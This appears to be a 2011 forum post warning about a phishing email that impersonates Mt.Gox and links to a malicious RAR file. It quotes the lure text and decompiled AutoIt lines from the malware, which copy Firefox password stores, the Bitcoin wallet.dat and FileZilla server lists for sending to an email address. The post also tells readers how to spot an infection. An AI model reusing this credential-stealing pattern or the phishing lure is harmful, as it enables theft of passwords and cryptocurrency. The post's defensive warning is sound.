You didn't fall for this email, did you:
Dear Mt.Gox user,
As i'm sure most of you are well aware, there has been a serious compromise of Mt. Gox's database.
We implore all of our users to take safety precautions to ensure their assets are not at risk, as your password may have been compromised
Please Follow the instructions here (Instructions are given by text and an image) :
http://www.fileden.com/files/2011/6/17/3153783/Mt.Gox-Safety-Tutorials.rarIt is very important that you follow these instructions to prevent any further compromises on other sites that you browse.
Thanks,
The Mt.Gox team
BTW, how can you be confident about viruses, etc, if you have an unencrypted wallet and you lost all your BTC from it. I mean, really, think about it.
Sorry to go a bit offtopic, but the robber who created that virus really went hardcore; full time robber!
Here's what it goes after (it's an AutoIt script compiled and UPX packed):
FileCopy(Execute(" @AppDataDir ") & "\Mozilla\Firefox\Profiles\" & $Var1512 & "\key3.db", "C:\temp1\")
FileCopy(Execute(" @AppDataDir ") & "\Mozilla\Firefox\Profiles\" & $Var1512 & "\signons*", "C:\temp1\signons")
FileCopy(Execute(" @AppDataDir ") & "\bitcoin\" & "wallet.dat", "C:\temp1\")
FileCopy(Execute(" @AppDataDir ") & "\filezilla\" & "recentservers.xml", "C:\temp1\")
And sends it to:
clintonlowe46@gmail.comEDIT: For those wondering if are infected, look for a folder names "readme" with a file inside named ""READ-FIRST.txt", inside your AppData dir (C:\documents and settings\<user>\Application Data (2k/xp) - c:\users\<user>\AppData\Roaming (Vista/7))
